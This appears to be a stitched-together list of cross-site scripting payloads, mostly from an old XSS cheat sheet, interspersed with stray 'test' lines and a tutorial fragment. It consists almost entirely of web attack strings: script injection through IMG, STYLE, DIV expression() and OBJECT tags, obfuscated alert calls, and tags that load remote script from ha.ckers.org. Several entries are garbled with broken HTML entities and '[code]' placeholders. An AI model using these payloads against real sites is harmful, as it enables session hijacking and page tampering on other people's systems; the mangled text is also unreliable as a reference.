DEF
<IMG SRC=JaVaScRiPt:alert('XSS')>
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
>">'>
test
alert(String.fromCharCode(88,83,83));'))">
foo=">">
<IMG SRC=javascript:alert("XSS")>
test
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
<;IMG SRC=";livescript:[code]";>;
\u0061\u006C\u0065\u0072\u0074(~'\u0061')test
Tada, there’s your first XSS vulnerability exploited. >"'>
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
test
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
'`"><\x3Cscript>javascript:alert(1)
<;IMG SRC=";mocha:[code]";>;
<;DIV STYLE=";width: expression(alert(';XSS';));";>;
http://www.test
OnMouseOver {Firefox & Opera}
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
test
\\'); alert(\'xss\');var x=\'
foo=">">